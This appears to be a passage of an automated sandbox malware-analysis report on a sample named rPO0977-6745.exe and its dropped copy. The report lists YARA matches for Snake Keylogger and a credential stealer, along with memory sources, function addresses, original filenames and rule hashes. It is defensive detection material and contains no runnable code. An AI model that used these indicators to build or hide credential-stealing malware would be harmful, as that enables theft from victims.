Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

.NET source code contains very large array initializations

Source: 0.2.rPO0977-6745.exe.7820000.5.raw.unpack, SizeParameters.cs	Large array initialization: : array initializer size 15921
Source: 0.2.rPO0977-6745.exe.31b9118.0.raw.unpack, SizeParameters.cs	Large array initialization: : array initializer size 15921

Source: C:\Users\user\Desktop\rPO0977-6745.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_02F7D5BC	0_2_02F7D5BC
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D19260	0_2_08D19260
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D139F8	0_2_08D139F8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D142D0	0_2_08D142D0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D11AE0	0_2_08D11AE0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D1ABB8	0_2_08D1ABB8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D12350	0_2_08D12350
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D16598	0_2_08D16598
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D11F18	0_2_08D11F18
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_01446108	10_2_01446108
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144C190	10_2_0144C190
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144B328	10_2_0144B328
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144C470	10_2_0144C470
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144E431	10_2_0144E431
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144C752	10_2_0144C752
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144F778	10_2_0144F778
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_014497E8	10_2_014497E8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_01446880	10_2_01446880
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144BBB8	10_2_0144BBB8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144CA32	10_2_0144CA32
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_01444AD9	10_2_01444AD9
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144BEB0	10_2_0144BEB0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_01443572	10_2_01443572
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144B4F2	10_2_0144B4F2
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144D7E0	10_2_0144D7E0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_0144D7F0	10_2_0144D7F0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBEE0A	10_2_06BBEE0A
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBA600	10_2_06BBA600
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB9FB0	10_2_06BB9FB0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBBF30	10_2_06BBBF30
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBAC48	10_2_06BBAC48
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB85B0	10_2_06BB85B0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBC580	10_2_06BBC580
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB0D48	10_2_06BB0D48
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBB290	10_2_06BBB290
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBD218	10_2_06BBD218
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB8B96	10_2_06BB8B96
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBCBD0	10_2_06BBCBD0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBB8E0	10_2_06BBB8E0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB36D8	10_2_06BB36D8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB5E70	10_2_06BB5E70
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB5E60	10_2_06BB5E60
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB9FA0	10_2_06BB9FA0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB6FF8	10_2_06BB6FF8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB6FE8	10_2_06BB6FE8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB6720	10_2_06BB6720
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBBF20	10_2_06BBBF20
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB6712	10_2_06BB6712
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB0498	10_2_06BB0498
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB0488	10_2_06BB0488
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB7CF0	10_2_06BB7CF0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB743F	10_2_06BB743F
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBAC37	10_2_06BBAC37
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB7450	10_2_06BB7450
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB55B2	10_2_06BB55B2
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB85A0	10_2_06BB85A0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBA5F0	10_2_06BBA5F0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB55C0	10_2_06BB55C0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB7D00	10_2_06BB7D00
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBC570	10_2_06BBC570
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB62BA	10_2_06BB62BA
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBB281	10_2_06BBB281
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB62C8	10_2_06BB62C8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB5A18	10_2_06BB5A18
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBD20A	10_2_06BBD20A
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB5A08	10_2_06BB5A08
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB43D8	10_2_06BB43D8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBCBC0	10_2_06BBCBC0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB6B78	10_2_06BB6B78
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB6B69	10_2_06BB6B69
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB3360	10_2_06BB3360
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB3350	10_2_06BB3350
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB78A8	10_2_06BB78A8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB7898	10_2_06BB7898
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB08F0	10_2_06BB08F0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB08E1	10_2_06BB08E1
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBB8D0	10_2_06BBB8D0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB0006	10_2_06BB0006
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB2858	10_2_06BB2858
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB2848	10_2_06BB2848
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB0040	10_2_06BB0040
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB5132	10_2_06BB5132
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB8158	10_2_06BB8158
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB8148	10_2_06BB8148
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BB5140	10_2_06BB5140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_00D4D5BC	11_2_00D4D5BC
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_04F88400	11_2_04F88400
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_04F88948	11_2_04F88948
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_04F8A481	11_2_04F8A481
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_04F80040	11_2_04F80040
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_04F8001C	11_2_04F8001C
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_04F8893B	11_2_04F8893B
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_08728518	11_2_08728518
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_087239F8	11_2_087239F8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_08721AE0	11_2_08721AE0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_087242D0	11_2_087242D0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_08722350	11_2_08722350
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_08728508	11_2_08728508
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_08726598	11_2_08726598
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_08729D98	11_2_08729D98
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_08721F18	11_2_08721F18
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4C190	23_2_00E4C190
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E46108	23_2_00E46108
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4B328	23_2_00E4B328
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4C470	23_2_00E4C470
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4E431	23_2_00E4E431
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4F77F	23_2_00E4F77F
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4C751	23_2_00E4C751
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E46880	23_2_00E46880
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E49858	23_2_00E49858
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E44AD9	23_2_00E44AD9
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4CA31	23_2_00E4CA31
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4BBB8	23_2_00E4BBB8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4BEB0	23_2_00E4BEB0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4B4F3	23_2_00E4B4F3
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E43570	23_2_00E43570
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4D7E0	23_2_00E4D7E0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E4D7F0	23_2_00E4D7F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EEE0D	23_2_064EEE0D
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EA600	23_2_064EA600
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064ED218	23_2_064ED218
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EB290	23_2_064EB290
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EBF30	23_2_064EBF30
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064ECBD0	23_2_064ECBD0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E8BF9	23_2_064E8BF9
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E9FB0	23_2_064E9FB0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EAC48	23_2_064EAC48
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EB8E0	23_2_064EB8E0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E0D48	23_2_064E0D48
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EC580	23_2_064EC580
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E85B0	23_2_064E85B0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E5E63	23_2_064E5E63
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E5E70	23_2_064E5E70
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064ED20A	23_2_064ED20A
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E5A08	23_2_064E5A08
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E5A18	23_2_064E5A18
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E62C8	23_2_064E62C8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E36D8	23_2_064E36D8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EB281	23_2_064EB281
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E62BC	23_2_064E62BC
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E3350	23_2_064E3350
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E6B69	23_2_064E6B69
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E3360	23_2_064E3360
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E6B78	23_2_064E6B78
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E6713	23_2_064E6713
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E6720	23_2_064E6720
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EBF20	23_2_064EBF20
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064ECBC0	23_2_064ECBC0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E43D8	23_2_064E43D8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E6FE8	23_2_064E6FE8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E6FF8	23_2_064E6FF8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E9FA0	23_2_064E9FA0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E2848	23_2_064E2848
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E7443	23_2_064E7443
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E0040	23_2_064E0040
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E2858	23_2_064E2858
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E7450	23_2_064E7450
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E0006	23_2_064E0006
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EAC38	23_2_064EAC38
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EB8D0	23_2_064EB8D0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E08E3	23_2_064E08E3
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E08F0	23_2_064E08F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E7CF0	23_2_064E7CF0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E048B	23_2_064E048B
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E0498	23_2_064E0498
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E7898	23_2_064E7898
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E78A8	23_2_064E78A8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E8148	23_2_064E8148
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E5140	23_2_064E5140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E8158	23_2_064E8158
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E7D00	23_2_064E7D00
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E5132	23_2_064E5132
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E55C0	23_2_064E55C0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EA5F0	23_2_064EA5F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E85A0	23_2_064E85A0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064E55B3	23_2_064E55B3

Source: rPO0977-6745.exe, 00000000.00000002.1269716508.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1265411156.00000000031E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1265411156.0000000003191000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1269312829.0000000007820000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1265815072.000000000436E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1263660255.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000000.1225855306.0000000000CFC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameikFw.exeD vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 0000000A.00000002.3686556908.0000000000F77000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
Source: rPO0977-6745.exe	Binary or memory string: OriginalFilenameikFw.exeD vs rPO0977-6745.exe

Source: rPO0977-6745.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
